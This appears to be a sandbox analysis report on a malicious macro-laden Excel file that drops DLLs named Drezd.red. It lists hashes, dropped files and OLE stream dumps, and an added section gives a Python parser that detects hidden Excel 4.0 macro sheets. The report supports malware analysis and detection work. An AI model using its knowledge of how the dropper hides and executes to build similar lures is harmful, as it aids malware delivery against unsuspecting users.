      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):162688
      Entropy (8bit):4.254419985994617
      Encrypted:false
      SSDEEP:1536:C6nL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:COJNSc83tKBAvQVCgOtmXmLpLm4l
      MD5:D0799DC754C6B53DA9AC3EDFEAE7C497
      SHA1:321489150A4B3693E72095F28AFC950CDA93F4B2
      SHA-256:785F37AF2F42EA4741A00241CFAC64D6C71E92BE7475927AE1F43CC18AE2D320
      SHA-512:7815A1C0595E681810333338B145A20316DD7169BC04FFFC3357C270770833654201BA9719434CAB8894954F141989C7AD6320D73EAD464C57BA509CC8678BE3
      Malicious:false
      Reputation:unknown
      Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
      C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):15676
      Entropy (8bit):4.533431190778817
      Encrypted:false
      SSDEEP:192:9xlA11DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkLde:938xesT20lheZ3waE5D7qxIxkxe
      MD5:93CDEC060A1F425C0D71BA179C046574
      SHA1:9CD4CBCA6FD883B4E96A72726EF3BCB216E8661F
      SHA-256:17E0F98101575FCB56EEA008FBBF1C61323F23E8F67F5F6F756706D35FA49F0C
      SHA-512:E1F8365EFB8081FA0E7FE11B5460DDF3D1B7E736976C418C4FA7E217B78160C41A6E24C0B5359BA395C175ED5FC52D2B21D369A48FF53878B9E94DB7EF368ECB
      Malicious:false
      Reputation:unknown
      Preview: MSFT................A...............................1............... ...................d...........,...................\...........H...4...........0... ...............................................................x...............................x.......................................................................................$"...............................................P..................................................$"..........................................0....P..,.........................0.....................%"..........................................H..."...................................................H.......(...................@...................P...............0.......`...............................p...X... ..................*HW.A..A.`............E.............F...........B........`..d......."E.............F........0..............F..........E........`.M...........CPf.........0..=.......01..)....w....<WI.......\.1Y........k...U........".......|...K..a...
      C:\Users\user\Drezd.red
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):1.6961804656486577
      Encrypted:false
      SSDEEP:1536:92VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:XC6MtAAFNJ5XC5SYCi02r+J
      MD5:B19B0AF9A01DD936D091C291B19696C8
      SHA1:862ED0B9586729F2633670CCD7D075D7693908E1
      SHA-256:17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
      SHA-512:9F0CE65AFA00919797A3A75308CF49366D5DCA0C17EA3CFAB70A9E9244E0D5AB6DEC21A3A46C2C609159E0CBF91AF4F10E6A36F3FB7310A5C2B062249AB43DB4
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 9%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Users\user\Drezd1.red
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):1.6961804656486577
      Encrypted:false
      SSDEEP:1536:92VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:XC6MtAAFNJ5XC5SYCi02r+J
      MD5:B19B0AF9A01DD936D091C291B19696C8
      SHA1:862ED0B9586729F2633670CCD7D075D7693908E1
      SHA-256:17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
      SHA-512:9F0CE65AFA00919797A3A75308CF49366D5DCA0C17EA3CFAB70A9E9244E0D5AB6DEC21A3A46C2C609159E0CBF91AF4F10E6A36F3FB7310A5C2B062249AB43DB4
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 9%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Users\user\Drezd2.red
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):1.6961804656486577
      Encrypted:false
      SSDEEP:1536:92VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:XC6MtAAFNJ5XC5SYCi02r+J
      MD5:B19B0AF9A01DD936D091C291B19696C8
      SHA1:862ED0B9586729F2633670CCD7D075D7693908E1
      SHA-256:17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
      SHA-512:9F0CE65AFA00919797A3A75308CF49366D5DCA0C17EA3CFAB70A9E9244E0D5AB6DEC21A3A46C2C609159E0CBF91AF4F10E6A36F3FB7310A5C2B062249AB43DB4
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 9%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Windows\System32\wbem\Performance\WmiApRpl_new.h
      Process:C:\Windows\System32\wbem\WMIADAP.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):3444
      Entropy (8bit):5.011954215267298
      Encrypted:false
      SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
      MD5:B133A676D139032A27DE3D9619E70091
      SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
      SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
      SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
      Malicious:false
      Reputation:unknown
      Preview: //////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
      C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
      Process:C:\Windows\System32\wbem\WMIADAP.exe
      File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
      Category:dropped
      Size (bytes):924
      Entropy (8bit):2.8598329685344623
      Encrypted:false
      SSDEEP:12:Q1NXCaAGaCGopGGD1JTi0SMfmCwOx6ivG:Q3wU/IM1x6oG
      MD5:2667367F9339639AF825E7122CE3B2A3
      SHA1:56E33B464F9AD8D0A6AC3343A85D7618D590FEDC
      SHA-256:B2353629E198C2F5244BC75AD797789FFBCA2CED084D731084AF312AD6DCBE7F
      SHA-512:A214C16977CFD760929F76D33DBA89277C6BC7B5948ACFBD89D6AF4A688B9F421D3D2860E1CAE81436E05A52FFED92B04AA2ABBF70CE7231A053BD3E724F3EA9
      Malicious:false
      Reputation:unknown
      Preview: .././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.........
      C:\Windows\system32\wbem\Performance\WmiApRpl.hec (copy)
      Process:C:\Windows\System32\wbem\WMIADAP.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):3444
      Entropy (8bit):5.011954215267298
      Encrypted:false
      SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
      MD5:B133A676D139032A27DE3D9619E70091
      SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
      SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
      SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
      Malicious:false
      Reputation:unknown
      Preview: //////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

      Static File Info

      General

      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Mon Sep 27 10:38:52 2021, Security: 0
      Entropy (8bit):7.131904320218787
      TrID:
      • Microsoft Excel sheet (30009/1) 47.99%
      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
      File name:Compensation-2308017-09272021.xls
      File size:129024
      MD5:52b4fcf57e4fb524cf33503e8a5272ef
      SHA1:d5b80e8ceaa81361da9ff6d18a4927dfd3b47d1a
      SHA256:a5bc073043d0729f825df8302f425148ce8c65214a87094fe96fe9039ac7f088
      SHA512:b52f725aaaa4491efe3c1b91a42ac74ab856ae1edfc838100553ac529df82553e43eb876ff40e3b6e03a5b8d693839b45d6d1b77283d8c0efe7f4e88dc549e9a
      SSDEEP:3072:Cik3hOdsylKlgxopeiBNhZFGzE+cL2kdAnc6YehWfG+tUHKGDbpmsiizBti2JtqV:vk3hOdsylKlgxopeiBNhZF+E+W2kdAni
      File Content Preview:........................>.......................................................b..............................................................................................................................................................................

      File Icon

      Icon Hash:e4eea286a4b4bcb4

      Static OLE Info

      General

      Document Type:OLE
      Number of OLE Files:1

      OLE File "Compensation-2308017-09272021.xls"

      Indicators

      Has Summary Info:True
      Application Name:Microsoft Excel
      Encrypted Document:False
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:True
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:True

      Summary

      Code Page:1251
      Author:Test
      Last Saved By:Test
      Create Time:2015-06-05 18:17:20
      Last Saved Time:2021-09-27 09:38:52
      Creating Application:Microsoft Excel
      Security:0

      Document Summary

      Document Code Page:1251
      Thumbnail Scaling Desired:False
      Company:
      Contains Dirty Links:False
      Shared Document:False
      Changed Hyperlinks:False
      Application Version:1048576

      Streams with VBA

      VBA File Name: UserForm2, Stream Size: -1
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2
      VBA File Name:UserForm2
      Stream Size:-1
      Data ASCII:
      Data Raw:
      VBA Code
      VBA File Name: Module5, Stream Size: 4241
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Module5
      VBA File Name:Module5
      Stream Size:4241
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 03 f0 00 00 00 a2 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff d0 03 00 00 9c 0d 00 00 00 00 00 00 01 00 00 00 fb 18 e3 25 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      VBA File Name: Sheet1, Stream Size: 991
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
      VBA File Name:Sheet1
      Stream Size:991
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . 9 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 fb 18 b4 39 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      VBA File Name: ThisWorkbook, Stream Size: 2501
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
      VBA File Name:ThisWorkbook
      Stream Size:2501
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r S . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 82 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 89 04 00 00 a9 07 00 00 00 00 00 00 01 00 00 00 fb 18 72 53 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      VBA File Name: UserForm2, Stream Size: 1182
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/UserForm2
      VBA File Name:UserForm2
      Stream Size:1182
      Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 fb 18 b2 4a 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code

      Streams

      Stream Path: \x1CompObj, File Type: data, Stream Size: 108
      General
      Stream Path:\x1CompObj
      File Type:data
      Stream Size:108
      Entropy:4.18849998853
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
      General
      Stream Path:\x5DocumentSummaryInformation
      File Type:data
      Stream Size:244
      Entropy:2.65175227267
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
      General
      Stream Path:\x5SummaryInformation
      File Type:data
      Stream Size:208
      Entropy:3.33231709703
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . . 6 { . . . . . . . . . . . .
      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 101831
      General
      Stream Path:Workbook
      File Type:Applesoft BASIC program data, first line number 16 (libmagic misidentification: the stream begins with the BIFF8 BOF record 09 08 10 00, record type 0x0809 with a 16-byte body, so this is the Excel workbook stream that holds the sheet data, not an Applesoft program)
      Stream Size:101831
      Entropy:7.65479066874
      Base64 Encoded:True
      Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @
      Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 54 65 73 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
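The Workbook stream is the BIFF8 workbook itself; libmagic mistakes its leading BOF record (09 08 10 00: record type 0x0809, body length 16) for Applesoft BASIC. In BIFF8 the workbook-globals substream also lists every sheet in BOUNDSHEET records (type 0x0085), whose hsState byte (0 visible, 1 hidden, 2 very hidden) and dt byte (0x01 = Excel 4.0 macro sheet) are exactly what a "hidden Macro 4.0" check inspects. The following is an added example, not part of the report, that walks BIFF records: it decodes the BOF bytes copied from the Data Raw dump above and then flags hidden XLM macro sheets in a constructed globals substream. The BOUNDSHEET records and sheet names in it are made up for the demonstration; the full Workbook stream is not on this page.

```python
import struct

# First 20 bytes of the Workbook stream, copied from the report's "Data Raw" dump:
# record header 09 08 10 00 (type 0x0809 = BOF, length 16) followed by the 16-byte BOF body.
WORKBOOK_HEAD = bytes.fromhex(
    "09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00"
)

BOF = 0x0809
BOUNDSHEET = 0x0085
SHEET_TYPES = {0x00: "worksheet", 0x01: "Excel 4.0 macro sheet", 0x02: "chart", 0x06: "VB module"}
HIDDEN_STATES = {0: "visible", 1: "hidden", 2: "very hidden"}


def iter_records(data):
    """Walk BIFF records: each is a 2-byte type, a 2-byte body length, then the body."""
    off = 0
    while off + 4 <= len(data):
        rtype, rlen = struct.unpack_from("<HH", data, off)
        off += 4
        yield rtype, data[off:off + rlen]
        off += rlen


def parse_bof(body):
    """BOF body: vers, dt (substream type), rupBuild, rupYear, bfh, sfo."""
    vers, dt, rup_build, rup_year, bfh, sfo = struct.unpack_from("<HHHHII", body, 0)
    return {"version": vers, "substream": dt, "build": rup_build,
            "year": rup_year, "history_flags": bfh, "lowest_version": sfo}


def parse_boundsheet(body):
    """BOUNDSHEET body: lbPlyPos, hsState, dt, then a ShortXLUnicodeString sheet name."""
    ply_pos, hs_state, dt = struct.unpack_from("<IBB", body, 0)
    cch, flags = body[6], body[7]
    if flags & 0x01:  # fHighByte set: UTF-16LE characters
        name = body[8:8 + 2 * cch].decode("utf-16-le")
    else:             # compressed: one byte per character
        name = body[8:8 + cch].decode("latin-1")
    return {"offset": ply_pos, "hidden": hs_state, "type": dt, "name": name}


def find_hidden_macro_sheets(data):
    """Return the BOUNDSHEET entries of Excel 4.0 macro sheets that are hidden or very hidden."""
    hits = []
    for rtype, body in iter_records(data):
        if rtype == BOUNDSHEET:
            sheet = parse_boundsheet(body)
            if sheet["type"] == 0x01 and sheet["hidden"] != 0:
                hits.append(sheet)
    return hits


def build_boundsheet(name, hs_state, sheet_type, ply_pos=0x1000):
    """Constructed BOUNDSHEET record (not taken from the sample) for exercising the walker."""
    raw = name.encode("latin-1")
    body = struct.pack("<IBB", ply_pos, hs_state, sheet_type) + bytes([len(raw), 0x00]) + raw
    return struct.pack("<HH", BOUNDSHEET, len(body)) + body


if __name__ == "__main__":
    rtype, body = next(iter_records(WORKBOOK_HEAD))
    assert rtype == BOF
    print("BOF:", parse_bof(body))  # version 0x0600 = BIFF8, substream 5 = workbook globals
    # Constructed globals substream: a visible worksheet plus a very-hidden XLM macro sheet.
    globals_stream = (WORKBOOK_HEAD
                      + build_boundsheet("Sheet1", 0, 0x00)
                      + build_boundsheet("Macro1", 2, 0x01))
    for s in find_hidden_macro_sheets(globals_stream):
        print(f"{s['name']}: {SHEET_TYPES[s['type']]}, {HIDDEN_STATES[s['hidden']]}")
```

On a real file the stream to feed `find_hidden_macro_sheets` is the `Workbook` entry of the OLE container (olefile's `openstream("Workbook")` returns it); the BOF decoded here reads version 0x0600 (BIFF8), substream 0x0005 (workbook globals) and build year 1997, which is what the 09 08 10 00 header always means in an .xls.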
      Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 662
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECT
      File Type:ASCII text, with CRLF line terminators
      Stream Size:662
      Entropy:5.27592988154
      Base64 Encoded:True
      Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 5 . . B a s e C l a s s = U s e r F o r m 2 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t
      Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37
      Stream Path: _VBA_PROJECT_CUR/PROJECTlk, File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537, Stream Size: 30
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECTlk
      File Type:dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
      Stream Size:30
      Entropy:1.37215976263
